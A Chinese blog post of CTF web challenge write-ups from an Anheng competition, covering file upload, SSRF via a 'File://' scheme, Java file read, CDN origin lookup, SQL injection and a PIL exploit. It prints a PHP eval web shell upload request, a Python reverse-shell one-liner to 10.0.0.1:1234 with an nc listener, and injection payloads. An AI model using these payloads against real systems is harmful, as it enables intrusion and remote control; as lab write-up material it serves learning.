<!DOCTYPE html>
<html style="display: none;" lang="zh">
    <head>
    <meta charset="utf-8">
    <!--
        © Material Theme
        https://github.com/viosey/hexo-theme-material
        Version: 1.5.6 -->
    <script>
        window.materialVersion = "1.5.6"
        // Delete localstorage with these tags
        window.oldVersion = [
            'codestartv1',
            '1.3.4',
            '1.4.0',
            '1.4.0b1',
            '1.5.0',
            '1.5.2',
            '1.5.5'
        ]
    </script>

    <!-- dns prefetch -->
    <meta http-equiv="x-dns-prefetch-control" content="on">









    <link rel="dns-prefetch" href="https://fonts.googleapis.com"/>





    <!-- Meta & Info -->
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">

    <!-- Title -->
    
    <title>
        
            安恒的一系列web | 
        
        RingFa1l
    </title>

    <!-- Favicons -->
    <link rel="icon shortcut" type="image/ico" href="/img/ling.png">
    <link rel="icon" href="/img/ling.png">

    <meta name="format-detection" content="telephone=no"/>
    <meta name="description" itemprop="description" content="">
    <meta name="keywords" content="null">
    <meta name="theme-color" content="#0097A7">

    <!-- Disable Fucking Bloody Baidu Tranformation -->
    <meta http-equiv="Cache-Control" content="no-transform" />
    <meta http-equiv="Cache-Control" content="no-siteapp" />

    <!--[if lte IE 9]>
        <link rel="stylesheet" href="/css/ie-blocker.css">

        
            <script src="/js/ie-blocker.zhCN.js"></script>
        
    <![endif]-->

    <!-- Import lsloader -->
    <script>(function(){window.lsloader={jsRunSequence:[],jsnamemap:{},cssnamemap:{}};lsloader.removeLS=function(a){try{localStorage.removeItem(a)}catch(b){}};lsloader.setLS=function(a,c){try{localStorage.setItem(a,c)}catch(b){}};lsloader.getLS=function(a){var c="";try{c=localStorage.getItem(a)}catch(b){c=""}return c};versionString="/*"+(window.materialVersion||"unknownVersion")+"*/";lsloader.clean=function(){try{var b=[];for(var a=0;a<localStorage.length;a++){b.push(localStorage.key(a))}b.forEach(function(e){var f=lsloader.getLS(e);if(window.oldVersion){var d=window.oldVersion.reduce(function(g,h){return g||f.indexOf("/*"+h+"*/")!==-1},false);if(d){lsloader.removeLS(e)}}})}catch(c){}};lsloader.clean();lsloader.load=function(f,a,b,d){if(typeof b==="boolean"){d=b;b=undefined}d=d||false;b=b||function(){};var e;e=this.getLS(f);if(e&&e.indexOf(versionString)===-1){this.removeLS(f);this.requestResource(f,a,b,d);return}if(e){var c=e.split(versionString)[0];if(c!=a){console.log("reload:"+a);this.removeLS(f);this.requestResource(f,a,b,d);return}e=e.split(versionString)[1];if(d){this.jsRunSequence.push({name:f,code:e});this.runjs(a,f,e)}else{document.getElementById(f).appendChild(document.createTextNode(e));b()}}else{this.requestResource(f,a,b,d)}};lsloader.requestResource=function(b,e,a,c){var d=this;if(c){this.iojs(e,b,function(h,f,g){d.setLS(f,h+versionString+g);d.runjs(h,f,g)})}else{this.iocss(e,b,function(f){document.getElementById(b).appendChild(document.createTextNode(f));d.setLS(b,e+versionString+f)},a)}};lsloader.iojs=function(d,b,g){var a=this;a.jsRunSequence.push({name:b,code:""});try{var f=new XMLHttpRequest();f.open("get",d,true);f.onreadystatechange=function(){if(f.readyState==4){if((f.status>=200&&f.status<300)||f.status==304){if(f.response!=""){g(d,b,f.response);return}}a.jsfallback(d,b)}};f.send(null)}catch(c){a.jsfallback(d,b)}};lsloader.iocss=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.iofonts=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.runjs=function(f,c,e){if(!!c&&!!e){for(var b in this.jsRunSequence){if(this.jsRunSequence[b].name==c){this.jsRunSequence[b].code=e}}}if(!!this.jsRunSequence[0]&&!!this.jsRunSequence[0].code&&this.jsRunSequence[0].status!="failed"){var a=document.createElement("script");a.appendChild(document.createTextNode(this.jsRunSequence[0].code));a.type="text/javascript";document.getElementsByTagName("head")[0].appendChild(a);this.jsRunSequence.shift();if(this.jsRunSequence.length>0){this.runjs()}}else{if(!!this.jsRunSequence[0]&&this.jsRunSequence[0].status=="failed"){var d=this;var a=document.createElement("script");a.src=this.jsRunSequence[0].path;a.type="text/javascript";this.jsRunSequence[0].status="loading";a.onload=function(){d.jsRunSequence.shift();if(d.jsRunSequence.length>0){d.runjs()}};document.body.appendChild(a)}}};lsloader.tagLoad=function(b,a){this.jsRunSequence.push({name:a,code:"",path:b,status:"failed"});this.runjs()};lsloader.jsfallback=function(c,b){if(!!this.jsnamemap[b]){return}else{this.jsnamemap[b]=b}for(var a in this.jsRunSequence){if(this.jsRunSequence[a].name==b){this.jsRunSequence[a].code="";this.jsRunSequence[a].status="failed";this.jsRunSequence[a].path=c}}this.runjs()};lsloader.cssfallback=function(e,c,b){if(!!this.cssnamemap[c]){return}else{this.cssnamemap[c]=1}var d=document.createElement("link");d.type="text/css";d.href=e;d.rel="stylesheet";d.onload=d.onerror=b;var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(d,a)};lsloader.runInlineScript=function(c,b){var a=document.getElementById(b).innerText;this.jsRunSequence.push({name:c,code:a});this.runjs()}})();</script>

    <!-- Import queue -->
    <script>function Queue(){this.dataStore=[];this.offer=b;this.poll=d;this.execNext=a;this.debug=false;this.startDebug=c;function b(e){if(this.debug){console.log("Offered a Queued Function.")}if(typeof e==="function"){this.dataStore.push(e)}else{console.log("You must offer a function.")}}function d(){if(this.debug){console.log("Polled a Queued Function.")}return this.dataStore.shift()}function a(){var e=this.poll();if(e!==undefined){if(this.debug){console.log("Run a Queued Function.")}e()}}function c(){this.debug=true}}var queue=new Queue();</script>

    <!-- Import CSS -->
    
        <style id="material_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_css","/css/material.min.css?Z7a72R1E4SxzBKR/WGctOA==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>
        <style id="style_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("style_css","/css/style.min.css?NKhlKQkXw/c66TR5p4wO+w==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>

        

    

    

    <!-- Config CSS -->

<!-- Other Styles -->
<style>
  body, html {
    font-family: Roboto, "Helvetica Neue", Helvetica, "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei", "微软雅黑", Arial, sans-serif;
    overflow-x: hidden !important;
  }
  
  code {
    font-family: Consolas, Monaco, 'Andale Mono', 'Ubuntu Mono', monospace;
  }

  a {
    color: #00838F;
  }

  .mdl-card__media,
  #search-label,
  #search-form-label:after,
  #scheme-Paradox .hot_tags-count,
  #scheme-Paradox .sidebar_archives-count,
  #scheme-Paradox .sidebar-colored .sidebar-header,
  #scheme-Paradox .sidebar-colored .sidebar-badge{
    background-color: #0097A7 !important;
  }

  /* Sidebar User Drop Down Menu Text Color */
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:hover,
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:focus {
    color: #0097A7 !important;
  }

  #post_entry-right-info,
  .sidebar-colored .sidebar-nav li:hover > a,
  .sidebar-colored .sidebar-nav li:hover > a i,
  .sidebar-colored .sidebar-nav li > a:hover,
  .sidebar-colored .sidebar-nav li > a:hover i,
  .sidebar-colored .sidebar-nav li > a:focus i,
  .sidebar-colored .sidebar-nav > .open > a,
  .sidebar-colored .sidebar-nav > .open > a:hover,
  .sidebar-colored .sidebar-nav > .open > a:focus,
  #ds-reset #ds-ctx .ds-ctx-entry .ds-ctx-head a {
    color: #0097A7 !important;
  }

  .toTop {
    background: #757575 !important;
  }

  .material-layout .material-post>.material-nav,
  .material-layout .material-index>.material-nav,
  .material-nav a {
    color: #757575;
  }

  #scheme-Paradox .MD-burger-layer {
    background-color: #757575;
  }

  #scheme-Paradox #post-toc-trigger-btn {
    color: #757575;
  }

  .post-toc a:hover {
    color: #00838F;
    text-decoration: underline;
  }

</style>


<!-- Theme Background Related-->

    <style>
      body{
        background-color: #F5F5F5;
      }

      /* blog_info bottom background */
      #scheme-Paradox .material-layout .something-else .mdl-card__supporting-text{
        background-color: #fff;
      }
    </style>




<!-- Fade Effect -->

    <style>
      .fade {
        transition: all 800ms linear;
        -webkit-transform: translate3d(0,0,0);
        -moz-transform: translate3d(0,0,0);
        -ms-transform: translate3d(0,0,0);
        -o-transform: translate3d(0,0,0);
        transform: translate3d(0,0,0);
        opacity: 1;
      }

      .fade.out{
        opacity: 0;
      }
    </style>


<!-- Import Font -->
<!-- Import Roboto -->

    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500" rel="stylesheet">


<!-- Import Material Icons -->


    <style id="material_icons"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_icons","/css/material-icons.css?pqhB/Rd/ab0H2+kZp0RDmw==",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>




    <!-- Import jQuery -->
    
        <script>lsloader.load("jq_js","/js/jquery.min.js?qcusAULNeBksqffqUM2+Ig==", true)</script>
    

    <!-- WebAPP Icons -->
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="application-name" content="RingFa1l">
    <meta name="msapplication-starturl" content="http://ringfall.top/2017/10/25/yqxjj/">
    <meta name="msapplication-navbutton-color" content="#0097A7">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-title" content="RingFa1l">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon" href="/img/ling.png">

    <!-- Site Verification -->
    
    

    <!-- RSS -->
    

    <!-- The Open Graph protocol -->
    <meta property="og:url" content="http://ringfall.top/2017/10/25/yqxjj/">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="安恒的一系列web | RingFa1l">
    <meta property="og:image" content="/img/ling.png">
    <meta property="og:description" content="">
    

    
        <meta property="article:published_time" content="Wed Oct 25 2017 23:04:14 GMT+0800">
        <meta property="article:modified_time" content="Mon Oct 01 2018 21:04:51 GMT+0800">
    

    <!-- The Twitter Card protocol -->
    <meta name="twitter:card" content="summary_large_image">

    <!-- Add canonical link for SEO -->
    
        <link rel="canonical" href="http://ringfall.top/2017/10/25/yqxjj/index.html" />
    

    <!-- Structured-data for SEO -->
    
        


<script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "BlogPosting",
    "mainEntityOfPage": "http://ringfall.top/2017/10/25/yqxjj/index.html",
    "headline": "安恒的一系列web",
    "datePublished": "Wed Oct 25 2017 23:04:14 GMT+0800",
    "dateModified": "Mon Oct 01 2018 21:04:51 GMT+0800",
    "author": {
        "@type": "Person",
        "name": "铃落",
        "image": {
            "@type": "ImageObject",
            "url": "/img/2.png"
        },
        "description": "铃音不才，纷落为歌。"
    },
    "publisher": {
        "@type": "Organization",
        "name": "RingFa1l",
        "logo": {
            "@type":"ImageObject",
            "url": "/img/ling.png"
        }
    },
    "keywords": "null",
    "description": "",
}
</script>


    

    <!-- Analytics -->
    
    
    

    <!-- Custom Head -->
    

</head>


    
        <body id="scheme-Paradox" class="lazy">
            <div class="material-layout  mdl-js-layout has-drawer is-upgraded">
                

                <!-- Main Container -->
                <main class="material-layout__content" id="main">

                    <!-- Top Anchor -->
                    <div id="top"></div>

                    
                        <!-- Hamburger Button -->
                        <button class="MD-burger-icon sidebar-toggle">
                            <span id="MD-burger-id" class="MD-burger-layer"></span>
                        </button>
                    

                    <!-- Post TOC -->

    
    <!-- Back Button -->
    <!--
    <div class="material-back" id="backhome-div" tabindex="0">
        <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon"
           href="#" onclick="window.history.back();return false;"
           target="_self"
           role="button"
           data-upgraded=",MaterialButton,MaterialRipple">
            <i class="material-icons" role="presentation">arrow_back</i>
            <span class="mdl-button__ripple-container">
                <span class="mdl-ripple"></span>
            </span>
        </a>
    </div>
    -->


    <!-- Left aligned menu below button -->
    
    
    <button id="post-toc-trigger-btn"
        class="mdl-button mdl-js-button mdl-button--icon">
        <i class="material-icons">format_list_numbered</i>
    </button>

    <ul class="post-toc-wrap mdl-menu mdl-menu--bottom-left mdl-js-menu mdl-js-ripple-effect" for="post-toc-trigger-btn" style="max-height:80vh; overflow-y:scroll;">
        <ol class="post-toc"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#绑定host-www-mooctest-net"><span class="post-toc-number">1.</span> <span class="post-toc-text">绑定host www.mooctest.net</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#babyupload"><span class="post-toc-number">2.</span> <span class="post-toc-text">babyupload</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#curl"><span class="post-toc-number">3.</span> <span class="post-toc-text">curl</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#war"><span class="post-toc-number">4.</span> <span class="post-toc-text">war</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#readme2"><span class="post-toc-number">5.</span> <span class="post-toc-text">readme2</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#source-ip"><span class="post-toc-number">6.</span> <span class="post-toc-text">source ip</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#hackedsite"><span class="post-toc-number">7.</span> <span class="post-toc-text">hackedsite</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#babysql3"><span class="post-toc-number">8.</span> <span class="post-toc-text">babysql3</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#snake"><span class="post-toc-number">9.</span> <span class="post-toc-text">snake</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#thinkphp5"><span class="post-toc-number">10.</span> <span class="post-toc-text">thinkphp5</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#总结"><span class="post-toc-number"></span> <span class="post-toc-text">总结</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#奇怪的恐龙特性"><span class="post-toc-number">0.1.</span> <span class="post-toc-text">奇怪的恐龙特性</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#GOGOGO"><span class="post-toc-number">0.2.</span> <span class="post-toc-text">GOGOGO</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#新瓶装旧酒"><span class="post-toc-number">0.3.</span> <span class="post-toc-text">新瓶装旧酒</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#ping也能把你ping挂"><span class="post-toc-number">0.4.</span> <span class="post-toc-text">ping也能把你ping挂</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#Ping"><span class="post-toc-number">0.5.</span> <span class="post-toc-text">Ping</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#进击的盲注"><span class="post-toc-number">0.6.</span> <span class="post-toc-text">进击的盲注</span></a></li></ol></li></ol>
    </ul>
    




<!-- Layouts -->

    <!-- Post Module -->
    <div class="material-post_container">

        <div class="material-post mdl-grid">
            <div class="mdl-card mdl-shadow--4dp mdl-cell mdl-cell--12-col">

                <!-- Post Header(Thumbnail & Title) -->
                
    <!-- Paradox Post Header -->
    
        <!-- Custom Thumbnail -->
        <div class="post_thumbnail-custom mdl-card__media mdl-color-text--grey-50" style="background-image:url(https://s1.ax1x.com/2017/12/31/pSD4r8.png)">
    
            <p class="article-headline-p">
                安恒的一系列web
            </p>
        </div>





                
                    <!-- Paradox Post Info -->
                    <div class="mdl-color-text--grey-700 mdl-card__supporting-text meta">

    <!-- Author Avatar -->
    <div id="author-avatar">
        <img src="/img/2.png" width="44px" height="44px" alt="Author Avatar"/>
    </div>
    <!-- Author Name & Date -->
    <div>
        <strong>铃落</strong>
        <span>10月 25, 2017</span>
    </div>

    <div class="section-spacer"></div>

    <!-- Favorite -->
    <!--
        <button id="article-functions-like-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon btn-like">
            <i class="material-icons" role="presentation">favorite</i>
            <span class="visuallyhidden">favorites</span>
        </button>
    -->

    <!-- Qrcode -->
    

    <!-- Tags (bookmark) -->
    

    <!-- Share -->
    
        <button id="article-fuctions-share-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon">
    <i class="material-icons" role="presentation">share</i>
    <span class="visuallyhidden">share</span>
</button>
<ul class="mdl-menu mdl-menu--bottom-right mdl-js-menu mdl-js-ripple-effect" for="article-fuctions-share-button">
    

    

    <!-- Share Weibo -->
    
        <a class="post_share-link" href="http://service.weibo.com/share/share.php?appkey=&title=安恒的一系列web&url=http://ringfall.top/2017/10/25/yqxjj/index.html&pic=http://ringfall.top/img/ling.png&searchPic=false&style=simple" target="_blank">
            <li class="mdl-menu__item">
                分享到微博
            </li>
        </a>
    

    <!-- Share Twitter -->
    
        <a class="post_share-link" href="https://twitter.com/intent/tweet?text=安恒的一系列web&url=http://ringfall.top/2017/10/25/yqxjj/index.html&via=铃落" target="_blank">
            <li class="mdl-menu__item">
                分享到 Twitter
            </li>
        </a>
    

    <!-- Share Facebook -->
    
        <a class="post_share-link" href="https://www.facebook.com/sharer/sharer.php?u=http://ringfall.top/2017/10/25/yqxjj/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Facebook
            </li>
        </a>
    

    <!-- Share Google+ -->
    
        <a class="post_share-link" href="https://plus.google.com/share?url=http://ringfall.top/2017/10/25/yqxjj/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Google+
            </li>
        </a>
    

    <!-- Share LinkedIn -->
    

    <!-- Share QQ -->
    

    <!-- Share Telegram -->
    
</ul>

    
</div>

                

                <!-- Post Content -->
                <div id="post-content" class="mdl-color-text--grey-700 mdl-card__supporting-text fade out">
    
        <h3 id="绑定host-www-mooctest-net"><a href="#绑定host-www-mooctest-net" class="headerlink" title="绑定host www.mooctest.net"></a>绑定host www.mooctest.net</h3><p>访问即可得到flag<br><br>  按套路应该是改hosts文件，路径为<code>C:\Windows\System32\drivers\etc</code>,要用管理员身份才能修改<br>  然而这题有bug哭唧唧，，坑了窝一半时间<br>  后来是访问<code>ip:port/index.php</code>抓包改了host头过的</p>
<h3 id="babyupload"><a href="#babyupload" class="headerlink" title="babyupload"></a>babyupload</h3><p>不能再简单了<br><br>  直接点开链接是Forbidden<br>  扫描目录（或者猜测）得到./upload.php<br>  发现显示<code>error:请选择上传文件</code>，但并没有发现可供上传的页面<br>  此时有两种姿势<br>  1.随便找个上传的题，抓个包，repeater里修改一下</p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line">Content-Type: multipart/form-data; boundary=---------------------------323842381428372</div><div class="line">Content-Length: 432</div><div class="line">Connection: close</div><div class="line">Upgrade-Insecure-Requests: 1</div><div class="line"></div><div class="line">-----------------------------323842381428372</div><div class="line">Content-Disposition: form-data; name=&quot;dir&quot;</div><div class="line"></div><div class="line">/uploads/</div><div class="line">-----------------------------323842381428372</div><div class="line">Content-Disposition: form-data; name=&quot;upfile&quot;; filename=&quot;mm.php&quot;</div><div class="line">Content-Type: application/php</div><div class="line"></div><div class="line">&lt;?php @eval($_POST[&apos;c&apos;]);?&gt;</div><div class="line">-----------------------------323842381428372</div><div class="line">Content-Disposition: form-data; name=&quot;submit&quot;</div><div class="line"></div><div class="line">Submit</div><div class="line">-----------------------------323842381428372--</div></pre></td></tr></table></figure>
<p>  2.寄几写一个上传的html然后提交到它的页面<br>  <figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">&lt;html&gt;</div><div class="line">&lt;form action=&quot;xxxxxxxxxx/upload.php&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;</div><div class="line">    &lt;input type=&quot;file&quot; name=&quot;upfile&quot; /&gt;</div><div class="line">    &lt;input type=&quot;submit&quot; /&gt;</div><div class="line">&lt;/form&gt;</div><div class="line">&lt;/html&gt;</div></pre></td></tr></table></figure></p>
<p>  此时抓包发现是这样叽哒<br>  <figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">Content-Type: multipart/form-data; boundary=---------------------------13123832232625</div><div class="line">Content-Length: 220</div><div class="line">Referer: http://localhost/ti/upfile.html</div><div class="line">Connection: close</div><div class="line">Upgrade-Insecure-Requests: 1</div><div class="line"></div><div class="line">-----------------------------13123832232625</div><div class="line">Content-Disposition: form-data; name=&quot;upfile&quot;; filename=&quot;mm.php&quot;</div><div class="line">Content-Type: application/php</div><div class="line"></div><div class="line">&lt;?php @eval($_POST[&apos;c&apos;]);?&gt;</div><div class="line">-----------------------------13123832232625--</div></pre></td></tr></table></figure></p>
<p>  值得注意的是，name=upfile这个是要猜的。。。<br>  然后用菜刀/蚁剑链接，flag在/var/www/html下</p>
<h3 id="curl"><a href="#curl" class="headerlink" title="curl"></a>curl</h3><p>老题目，新waf,新姿势<br><br>  初始链接为<code>./index.php?url=http://www.mooctest.net/</code><br>  是一个php写的curl(数据传输)，可以ssrf<br>  然后用file协议（用于访问本地计算机中的文件）读取源码<br>  大写绕过waf<br>  感觉老司机的话都是先读/etc/passwd啊什么的。。。<br>  <code>./index.php?url=File://index.php</code></p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">$url = $_GET[&apos;url&apos;];	</div><div class="line">if (preg_match(&quot;/file:[^\w]+/&quot;, $url)) exit(&quot;hacker go away!&quot;);</div><div class="line">$ch = curl_init();</div><div class="line">curl_setopt($ch, CURLOPT_URL, &quot;$url&quot;);</div><div class="line">curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);</div><div class="line">curl_setopt($ch, CURLOPT_HEADER, 0);</div><div class="line">$output = curl_exec($ch);</div><div class="line">curl_close($ch);</div><div class="line">$flag = &quot;flag&#123;xxxxxxxxxxxxxxx&#125;&quot;;</div><div class="line">print_r($output);</div></pre></td></tr></table></figure>
<h3 id="war"><a href="#war" class="headerlink" title="war"></a>war</h3><p>this is a war<br><br>  源码有提示：<code>&lt;!--flag就在这个页面，怎么找到源码呢 tips:tomcat部署--&gt;</code><br>  结果直接名字.war就有了，解压出源码。。</p>
<h3 id="readme2"><a href="#readme2" class="headerlink" title="readme2"></a>readme2</h3><p>java go to page<br><br>  点开帮助（微笑）<br>  这儿的代码具体是</p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">&lt;footer&gt;</div><div class="line">  &lt;div id=&quot;help&quot;&gt;帮助&lt;/div&gt;</div><div class="line">&lt;/footer&gt;</div><div class="line">&lt;script src=&quot;js/search.js&quot;&gt;&lt;/script&gt;</div></pre></td></tr></table></figure>
<p>  然后点开js/search.js是<br>  <figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">$(function()&#123;</div><div class="line">$(&quot;#help&quot;).click(function()&#123;</div><div class="line">    location.href=&quot;show.do?page=help.jsp&quot;;</div><div class="line">&#125;)</div><div class="line">&#125;);</div></pre></td></tr></table></figure></p>
<p>  所以本瞎子是看不出这个能点开的（脸上笑嘻嘻心里mmp）<br>  跳转到了<code>./test/show.do?page=help.jsp</code><br>  然后搜索Java任意文件读取漏洞<br>  找呀找找呀找找到惹<a href="https://bbs.ichunqiu.com/forum.php?mod=viewthread&amp;tid=23587&amp;highlight=Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E8%BF%9E%E8%BD%BD" target="_blank" rel="external">这个</a><br>  进入<code>./test/show.do?page=WEB-INF/web.xml</code>查看系统配置文件<br>  看到<code>index.jsp ConfigPropertie /WEB-INF/properties/configInfo.properties Index com.cn.dbapp.Index Index /show.do 500 /index.jsp 404 /index.jsp</code><br>  进入<code>./test/show.do?page=/WEB-INF/properties/configInfo.properties</code>发现key</p>
<h3 id="source-ip"><a href="#source-ip" class="headerlink" title="source ip"></a>source ip</h3><p>找到目标网站www.mooctest.net 的源ip<br><br>  这题姿势也各种各样~要绕过cdn<br>  容易想到的是用找回密码探测邮箱ip<br>  <code>https://jingyan.baidu.com/article/17bd8e522abb8085ab2bb8b2.html</code><br>  还有就是<a href="http://xiaix.me/rao-guo-cdncha-zhao-wang-zhan-zhen-shi-ip/" target="_blank" rel="external">这个博客</a>里的姿势啦<br>  在<a href="https://fofa.so/" target="_blank" rel="external">https://fofa.so/</a> 搜索title等有标志性的特征源码</p>
<h3 id="hackedsite"><a href="#hackedsite" class="headerlink" title="hackedsite"></a>hackedsite</h3><p>寻找前人的足迹<br><br>  据嗦啊，疯狂拿字典扫出./upload/phpspy.php然后用默认密码angel登录出flag<br>  注意扫目录要打开403，forbidden和not found不一样~</p>
<h3 id="babysql3"><a href="#babysql3" class="headerlink" title="babysql3"></a>babysql3</h3><p>注入点为id</p>
<p>反引号闭合<br>猜测代码为<br><code>select * from table where 反引$a反引=$b</code><br>不断探测<br>最后payload<br><code>keyname=1&amp;name=id反引=0 union select 1,2,反引flag反引 from flag--</code><br>构造为<br><code>select * from table where 反引id反引=0 union select 1,2,反引flag反引 from flag-- 反引=1</code></p>
<h3 id="snake"><a href="#snake" class="headerlink" title="snake"></a>snake</h3><p>生成一个图片玩玩<br>  题目地址： <a href="http://118.178.18.181:46019/" target="_blank" rel="external">http://118.178.18.181:46019/</a><br>  源码地址: <a href="http://114.55.36.69:46011/src.tar" target="_blank" rel="external">http://114.55.36.69:46011/src.tar</a><br>  python PIL rce<br></p>
<p>搜索漏洞找到<a href="https://github.com/neargle/PIL-RCE-By-GhostButt/blob/master/poc.png" target="_blank" rel="external">poc</a></p>
<p>把命令改成弹shell的（多试几个），最后我使用的好像是</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">python -c <span class="string">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span></div></pre></td></tr></table></figure>
<p>然后在vps上监听<code>nc -lvvp 1234</code>就吼啦~</p>
<p>第一次弹shell，有点小激动，合影合影。</p>
<h3 id="thinkphp5"><a href="#thinkphp5" class="headerlink" title="thinkphp5"></a>thinkphp5</h3><p>跟waf正面刚！源码html.tar.gz<br>  题目地址： <a href="http://114.55.91.27:46011/" target="_blank" rel="external">http://114.55.91.27:46011/</a><br>  提示：<br>  thinkphp5 任意文件删除<br>  反序列化<br></p>
<p> (貌似最后米有人做粗来，虽然小菲菲去问惹粗题人然后肥了“加油(ง •̀_•́)ง”233333333)  </p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>虽然嗦是一系列题貌似只写了分区决赛的ORZ</p>
<p>这三周的比赛从安全谷到上海到南京虽然都是半天的比赛时间，但总觉得感触颇深啊，安恒这次的题的确属于不是很难的那种，加上总决赛没有网，虽然有惊喜有遗憾，加上一些去远方的感想，复杂的情绪无以言喻，就让其存于此吧。</p>
<p>军校很是帅气，</p>
<p>而南大，真的是那种，很适合养老的地方啊。</p>
<p><br></p>
<hr>
<p>2018-9-30更新</p>
<p>又是新的一年的这个比赛。。。秋季预选，一眼望去都是原题x然鹅窝这记性，，，哭</p>
<h4 id="奇怪的恐龙特性"><a href="#奇怪的恐龙特性" class="headerlink" title="奇怪的恐龙特性"></a>奇怪的恐龙特性</h4><ul>
<li>A.A自动转化为A_A</li>
<li>数组绕过大小比较</li>
</ul>
